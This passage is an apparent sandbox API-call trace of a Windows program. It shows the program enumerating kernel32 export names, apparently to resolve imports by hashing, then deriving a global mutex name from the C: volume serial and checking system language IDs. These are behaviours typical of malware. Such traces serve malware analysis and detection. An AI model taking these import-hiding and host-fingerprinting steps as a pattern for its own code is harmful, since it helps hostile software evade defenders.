lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.303] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.303] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.303] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.303] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.303] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.303] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.303] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.303] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.303] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.303] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.303] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.303] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.303] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.303] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.303] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.303] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.304] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.304] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.304] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.304] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.304] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.304] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.304] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.304] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.304] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.304] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.304] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.304] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.304] lstrlenA (lpString="DELETEATOM") returned 10 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.304] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.304] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.304] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.304] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.304] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.304] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.305] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.305] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.305] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.305] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.305] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.305] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.305] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.305] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.305] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.305] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.305] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.305] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.305] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.305] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.305] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.305] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.305] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.305] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.305] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.306] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.306] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.306] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.306] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.306] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.306] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.306] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.306] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.306] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.306] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.306] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.306] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.306] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.306] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.306] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.306] GetWindowsDirectoryW (in: lpBuffer=0x239f198, uSize=0x200 | out: lpBuffer="C:\\Windows") returned 0xa [0178.307] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x239efec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x239efec*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0178.307] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x360000 [0178.310] wsprintfW (in: param_1=0x360000, param_2="%x%x" | out: param_1="9cda09f29c354b42") returned 16 [0178.310] GetUserDefaultUILanguage () returned 0x409 [0178.310] GetSystemDefaultLangID () returned 0x460409 [0178.311] GetUserDefaultLangID () returned 0x409 [0178.311] GetTickCount64 () returned 0x113407a [0178.314] wsprintfW (in: param_1=0x239f698, param_2="Global\\%s" | out: param_1="Global\\9cda09f29c354b42") returned 23 [0178.314] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\9cda09f29c354b42") returned 0x1e0 [0178.315] GetLastError () returned 0x0 [0178.315] GetLastError () returned 0x0 [0178.322] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x370000 [0178.328] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.328] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x370000 [0178.331] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x380000 [0178.331] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x390000 [0178.339] lstrlenA (lpString="kernel32.dll") returned 12 [0178.339] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.339] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.339] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.339] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.339] lstrlenA (lpString="ADDATOMA") returned 8 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.339] lstrlenA (lpString="ADDATOMW") returned 8 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.339] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.339] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.339] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.339] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.339] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.339] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.339] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.339] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.339] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.339] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.340] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.340] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.340] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.340] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.340] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.340] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.340] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.340] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.340] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.340] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.340] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.340] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.340] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.340] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.340] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.340] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.340] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.340] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.340] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.341] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.341] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.341] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.341] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.341] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.341] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.341] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.341] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.341] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.341] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.341] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.341] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.341] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.341] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.341] 